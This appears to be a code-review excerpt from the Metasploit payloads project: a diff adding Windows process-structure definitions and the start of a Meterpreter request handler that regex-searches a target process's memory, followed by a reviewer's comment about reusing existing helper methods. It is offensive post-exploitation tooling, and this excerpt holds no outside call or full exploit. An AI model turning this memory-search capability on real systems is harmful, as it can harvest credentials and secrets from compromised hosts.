c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c

```diff
@@ -339,3 +340,359 @@ DWORD request_sys_process_memory_unlock(Remote *remote, Packet *packet)
+	PVOID Reserved2[10];
+	UNICODE_STRING ImagePathName;
+	UNICODE_STRING CommandLine;
+} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;
+
+typedef
+VOID
+(NTAPI* PPS_POST_PROCESS_INIT_ROUTINE) (
+	VOID
+	);
+
+typedef struct _PEB {
+	BYTE Reserved1[2];
+	BYTE BeingDebugged;
+	BYTE Reserved2[1];
+	PVOID Reserved3[2];
+	PPEB_LDR_DATA Ldr;
+	PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
+	BYTE Reserved4[104];
+	PVOID Reserved5[52];
+	PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
+	BYTE Reserved6[128];
+	PVOID Reserved7[1];
+	ULONG SessionId;
+} PEB, * PPEB;
+
+typedef struct _PROCESS_BASIC_INFORMATION {
+	PVOID Reserved1;
+	PPEB PebBaseAddress;
+	PVOID Reserved2[2];
+	ULONG_PTR UniqueProcessId;
+	PVOID Reserved3;
+} PROCESS_BASIC_INFORMATION;
+typedef PROCESS_BASIC_INFORMATION* PPROCESS_BASIC_INFORMATION;
+
+typedef enum _PROCESSINFOCLASS {
+	ProcessBasicInformation = 0,
+	ProcessWow64Information = 26
+} PROCESSINFOCLASS;
+
+BOOL can_read_memory(DWORD memory_protect)
+{
+	const int page_execute_read = 0x20;
+	const int page_execute_readwrite = 0x40;
+	const int page_readonly = 0x02;
+	const int page_readwrite = 0x04;
+
+	return memory_protect == page_execute_read ||
+		memory_protect == page_execute_readwrite ||
+		memory_protect == page_readonly ||
+		memory_protect == page_readwrite;
+}
+
+// In order to be able to regex null-butes, we need to store the length explicitly, so that null-bytes aren't being treated as the end of a string.
+struct regex_needle
+{
+	char* raw_needle_buffer;
+	size_t length;
+	regex_t* compiled_needle;
+};
+
+#define NEEDLES_MAX (size_t)5
+
+DWORD request_sys_process_memory_search(Remote* remote, Packet* packet)
+{
+	Packet* response = met_api->packet.create_response(packet);
+	DWORD result = ERROR_SUCCESS;
+	char* needle = NULL;
+	char* buffer = NULL;
+	size_t needle_enum_index = 0;
+	
+	dprintf("[MEM SEARCH] Getting PID...");
+	const DWORD pid = met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_PID);
+	if (pid == 0) { result = ERROR_INVALID_PARAMETER; goto done; }
+	dprintf("[MEM SEARCH] Searching PID: %lu", pid);
+
+	// Iterate over all the needles in the packet.
+	Tlv needle_buffer_tlv, needle_length_tlv;
+	struct regex_needle* regex_needles[NEEDLES_MAX];
+	while (needle_enum_index < (size_t)NEEDLES_MAX && met_api->packet.enum_tlv(packet, (DWORD)needle_enum_index, TLV_TYPE_MEMORY_SEARCH_NEEDLE, &needle_buffer_tlv) == ERROR_SUCCESS)
+	{
+		size_t needle_length = 0;
+		if (met_api->packet.enum_tlv(packet, (DWORD)needle_enum_index, TLV_TYPE_MEMORY_SEARCH_NEEDLE_LENGTH, &needle_length_tlv) != ERROR_SUCCESS)
+		{
+			dprintf("[MEM SEARCH] Got needle, but no length. Defaulting to using strlen, meaning null-bytes won't be searched for.");
+			needle_length = strlen((char*)needle_buffer_tlv.buffer);
+			dprintf("[MEM SEARCH] Needle length: %u", needle_length);
+		}
+		else
+		{
+			dprintf("[MEM SEARCH] Getting needle length...");
+			needle_length = ntohl(*(PUINT)needle_length_tlv.buffer);

```

Comment:
I haven't verified, but this looks out of place - is there not already a uint/qword methods already?

https://github.com/rapid7/metasploit-payloads/blob/f539248b2ecd36aa98e9acee278b3bf644460881/c/meterpreter/source/extensions/extapi/window.c#L201-L203

https://github.com/rapid7/metasploit-payloads/blob/f539248b2ecd36aa98e9acee278b3bf644460881/c/meterpreter/source/extensions/stdapi/server/net/socket/tcp.c#L249